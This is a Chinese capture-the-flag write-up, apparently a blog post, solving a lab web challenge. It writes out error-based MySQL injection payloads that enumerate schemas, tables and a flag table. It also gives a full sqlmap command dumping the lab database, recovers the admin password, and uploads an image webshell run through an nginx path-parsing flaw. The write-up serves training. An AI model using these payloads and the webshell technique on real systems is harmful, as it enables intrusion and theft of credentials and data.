前言
做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。
解题过程
打开传送门,被传送到这个网站
![在这里插入图片描述](https://img-blog.csdnimg.cn/0681f0339c9d4ef59cfa3f99a7a4384d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了
![在这里插入图片描述](https://img-blog.csdnimg.cn/f23dc751b3564502a43ca106dde7e75f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
扫到了admin目录,这个应该是后台登录网址,打开一看果然是
![在这里插入图片描述](https://img-blog.csdnimg.cn/4c46861d2b164eb696274cde675743b6.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
一开始密码暴力破解,没有破解到,开始有点烦躁。
(暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试
然后想是否存在sql注入绕过密码登录的方法,试了试
![在这里插入图片描述](https://img-blog.csdnimg.cn/318b45a1b4ea44fbb8015854cba974bb.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
无果
![在这里插入图片描述](https://img-blog.csdnimg.cn/23560b3016d649369a7d94e29ad6ce9e.png)
那报错注入呢?
输入
' or gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1)
![在这里插入图片描述](https://img-blog.csdnimg.cn/aae1a35217674b1cb9e990ea9de9a3eb.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
结果还真把报错信息输出到页面上了(内心狂喜)
所有库名一览无遗
![在这里插入图片描述](https://img-blog.csdnimg.cn/168fbb19566140689d9d3a68585469f8.png)
接着开始找flag
查找caidian里的表(因为网页是属于caidian目录下的)
' or gtid_subset(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="caidian")),1)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9c1c80ed65ad443ba601218330cf4204.png)
找到flag表了!心想flag一定在那个表里
查询flag表的字段
' or gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag" and table_schema="caidian")),1)
![在这里插入图片描述](https://img-blog.csdnimg.cn/5a8a3ea5a27241049c7b01f787bef54e.png)
查询flag表的记录
' or gtid_subset(concat(0x7e,(select group_concat(concat(id,':',flag)) from caidian.flag)),1)
![在这里插入图片描述](https://img-blog.csdnimg.cn/c6e9cabded694d21892d3f117105f5d5.png)
flag这不就拿到了吗,简简单单,结果拿去提交发现。。
![在这里插入图片描述](https://img-blog.csdnimg.cn/1aa1b0aafbe0490f91d19e21b45a306a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
我还特意试了几遍,还真不是这个flag,烦躁值再+1。这时再想了想,管理员账号密码应该在数据库里把,找到账号密码不就可以登录后台了吗,也许后台有我要的flag,所以直接上sqlmap,找账号密码。
sqlmap -u "http://oovw8022.ia.aqlab.cn:8022/caidian/admin/?r=login" --data="user=12&password=123&login=yes" --technique="E" -v 3 -D caidian --tables --dump-all
![在这里插入图片描述](https://img-blog.csdnimg.cn/e99e2ce54e9246d18f220ffb7fa1f97c.png)
找到了账号密码在manage表里
![在这里插入图片描述](https://img-blog.csdnimg.cn/71eb61cd775d4d3f84acd57d825c6b36.png)
密码解码一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/5aca7c1d30bf4e21827f1e13cb0b214a.png)
可以拿去登后台了
![在这里插入图片描述](https://img-blog.csdnimg.cn/29423de060fa4eb29e6440c1fd190d79.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
然后找了一圈也没发现flag
这是逼我getshell查找网站目录文件内容了
想要getshell就必须找到上传点
![在这里插入图片描述](https://img-blog.csdnimg.cn/dc675d92076b4e0a8629c535940d511b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
找到上传点了,这里只能上传图片文件,那我就上传一个图片马把,至于图片马怎么弄自行百度把
对了,记得上传php木马,下面可以看到该网站使用的脚本语言和服务器,这里nginx1.15.11版本有个解析漏洞,下面会说明
![在这里插入图片描述](https://img-blog.csdnimg.cn/476c68d0bea64752bdc0d44355eb657d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
直接访问刚刚文件的上传点(这个上传点地址在资料设置可以看到)http://oovw8022.ia.aqlab.cn:8022/caidian/upload/touxiang/55011641134127.jpg/.php
![在这里插入图片描述](https://img-blog.csdnimg.cn/fd084fa1c3794ecc9d9f721a60fc58fa.png)
为什么这里要加/.php
正常访问.jpg浏览器是不能解析php代码的
但是加了/.php就能解析php代码
这就是nginx1.15.11版本的解析漏洞,有兴趣自行了解一下
直接上蚁剑,密码是自己图片马的参数
![在这里插入图片描述](https://img-blog.csdnimg.cn/f4d90873371648a68c8e81f3d4cac82f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
成功连接
![在这里插入图片描述](https://img-blog.csdnimg.cn/01e853cc58874c3fa8a29e44e27b569e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
这里找了很久,从一个叫config.php文件中,揪出了flag
![,](https://img-blog.csdnimg.cn/89d6065c27dd4826a56669306034084d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/589a84d211ea476d970e065a02f9542e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
拿去提交
![在这里插入图片描述](https://img-blog.csdnimg.cn/6457dfbeedd842d8acefca1debdfaa74.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5rS7552AVml2Ye6Mkg==,size_20,color_FFFFFF,t_70,g_se,x_16)
顺便提一下,第一次提交的flag好像是信息收集2
的flag。。
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)